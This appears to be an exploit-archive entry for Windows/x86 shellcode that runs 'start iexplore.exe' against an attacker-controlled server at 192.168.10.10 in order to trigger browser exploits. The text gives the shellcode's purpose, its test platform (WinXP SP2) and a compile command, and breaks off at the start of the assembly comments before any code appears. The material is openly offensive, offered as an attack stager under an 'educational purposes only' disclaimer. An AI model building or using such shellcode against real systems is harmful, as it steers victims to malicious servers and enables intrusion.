Exploits / Vulnerability Discovered : 2019-06-28 |
Type : shellcode |
Platform : windows_x86
This exploit / vulnerability Windows/x86 start iexplore.exe (http://192.168.10.10/) shellcode (191 bytes) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
/*
# Title: start iexplore.exe
# Author: Joseph McDonagh
# Shellcode length 191
# Could be smaller if the app your are exploiting loads msvcrt.
# Purpose: Use the start command to open internet explorer and connect to a malicious web server
# The command this runs is simply start iexplore.exe http://192.168.10.10/ (Attacker controlled server), which can lead to a more productive payload.
# This code can exploit browser vulnerabilities without (or with) social engineering.
# Tested on: WinXP SP 2
# Thanks to Kartik Durg and sharing the shellcode entry 46281 and sharing the details on the iamroot blog https://iamroot.blog/2019/01/28/windows-shellcode-download-and-execute-payload-using-msiexec/. This got me going in the right direction. And to POB. Using "start" is helpful for this type of payload.
# Complile on Kali #i686-w64-mingw32-gcc sie.c -o sie.exe
#
***** Assembly code follows *****
; The portion loads msvcrt to make the syscall.
; Hardcoded for winxp